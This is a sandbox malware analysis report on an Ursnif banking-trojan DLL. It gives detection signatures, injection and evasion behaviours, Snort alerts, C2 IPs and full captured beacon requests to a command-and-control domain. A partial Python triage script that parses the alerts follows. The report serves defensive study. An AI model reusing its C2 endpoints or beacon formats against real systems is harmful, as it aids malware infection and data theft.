Windows Analysis Report status.dll

Overview

General Information

Sample Name: status.dll
Analysis ID: 555803
MD5: 947fe47db34a2654fc7aa76ec2bebec0
SHA1: 6e2d76945861c48a2e4552d87583c1a70e6525a2
SHA256: 02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
Tags: exe gozi italy ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Maps a DLL or memory area into another process
Writes to foreign memory regions
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: status.dll ReversingLabs: Detection: 23%
Machine Learning detection for sample
Source: status.dll Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_017D4872
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_02D44872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_04AA4872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_00AC4872

Compliance:

Uses 32bit PE files
Source: status.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.407600031.0000000005070000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.432953884.0000000005E00000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.432954394.00000000064C0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.402949570.0000000005AD0000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_03B08B0F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B10219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_03B10219
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B016BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_03B016BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E16BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_048E16BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_048F0219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_048E8B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059116BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_059116BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_05918B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05920219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_05920219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A0219 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_009A0219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00998B0F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_00998B0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009916BA lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_009916BA
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08F03 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_03B08F03

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49748 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49756 -> 31.41.44.3:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 62.173.145.37:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 62.173.145.37:80
Source: Traffic Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.3:49764 -> 62.173.149.135:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 62.173.149.135:80
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.10.3 (Ubuntu)
    Date: Wed, 19 Jan 2022 10:50:28 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    (The body is a single chunk of 0x6b = 107 bytes carrying a gzip stream, magic 1f 8b, followed by the zero-length terminating chunk 30 0d 0a 0d 0a; the gzip trailer ISIZE 0x92 gives 146 bytes of uncompressed HTML. The compressed bytes have no meaningful ASCII rendering.)
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.10.3 (Ubuntu)
    Date: Wed, 19 Jan 2022 10:50:31 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    (Same structure as the response above: one 107-byte gzip chunk, ISIZE 146, then the terminating chunk.)
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: unknown UDP traffic detected without corresponding DNS query: 208.67.222.222
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, regsvr32.exe, 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, powershell.exe, 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, powershell.exe, 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: regsvr32.exe, 00000004.00000003.346708342.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.353643418.0000000002F63000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.346671708.0000000002F63000.00000004.00000001.sdmp String found in binary or memory: http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8
Source: regsvr32.exe, 00000004.00000003.333637218.0000000002F52000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.333810799.0000000002F62000.00000004.00000001.sdmp String found in binary or memory: http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7Hyzb
Source: unknown DNS traffic detected: queries for: museumistat.bar
Source: global traffic HTTP traffic detected:
    GET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/ml7QN9H69bQc_2FqcErn/JWHN_2F1D_2FeQ7F2rf/oeEjPxzB_2Fw_2F8MEJzC6/5gAnzEpRNXWFk/64j4iITJ/jnOThCTb9WelDC2Av_2F9i8/VHepa0UCDh/KFl9Z1ZbYspbJ4E8_/2BzgcxaTppah/d9hJDFKgAt8/5U8WBthgJgfyxM/8RFDoFNHkI_2FZphi7QxP/YaWR2kATqPAKO_2B/PJwm2MPaqbbSQg_/2BLvMKsgjJPPYLJl45/I0CzZhv6_2FCZxS/FG1.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: museumistat.bar
    Connection: Keep-Alive
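Added triage example (not part of the Joe Sandbox report and not the sample's code): it parses the Snort alert lines listed in this section into a per-SID hit count and a set of C2 endpoints, and checks the request paths above for the URI structure that ET 2033203 / 2033204 are named after. Assumptions that the report does not state: the first directory (/drew/) is a campaign-specific prefix; the remainder is URL-encoded base64 with '%' rewritten to '_', so _2B and _2F stand for '+' and '/'; the recovered blob is ciphertext, so only its structure and length are examined, not its content. The alert lines and the two request paths are copied from the evidence above; the short /drew/_2B_2F/_2B_2F.jlk path in the usage is constructed.

```python
"""Triage of the Networking evidence above: Snort alert parsing and Ursnif beacon URI checks."""
import base64
import re
from collections import Counter

# Alert lines copied from the Snort IDS evidence in this report.
SNORT_LINES = [
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49748 -> 31.41.44.3:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49751 -> 31.41.44.3:80",
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49751 -> 31.41.44.3:80",
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.44.3:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 31.41.44.3:80",
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.44.3:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 31.41.44.3:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.44.3:80",
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49756 -> 31.41.44.3:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 62.173.145.37:80",
    "Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 62.173.145.37:80",
    "Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.3:49764 -> 62.173.149.135:80",
    "Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 62.173.149.135:80",
]

ALERT_RE = re.compile(
    r"Snort IDS: (?P<sid>\d+) (?P<msg>.+?) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)$"
)


def parse_alerts(lines):
    """Return one dict per line that carries a Snort alert; other lines are skipped."""
    alerts = []
    for line in lines:
        m = ALERT_RE.search(line)
        if m is None:
            continue
        a = m.groupdict()
        for k in ("sid", "sport", "dport"):
            a[k] = int(a[k])
        alerts.append(a)
    return alerts


def summarize(alerts):
    """Hit count per SID and the distinct destination endpoints (the C2 candidates)."""
    return {
        "sids": Counter(a["sid"] for a in alerts),
        "c2": sorted({(a["dst"], a["dport"]) for a in alerts}),
    }


# Assumption: the beacon path is URL-encoded base64 with '%' rewritten to '_',
# so _2B and _2F (the tokens ET 2033203 / 2033204 are named after) are '+' and '/'.
URI_TOKENS = {"_2B": "+", "_2F": "/"}
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+$")


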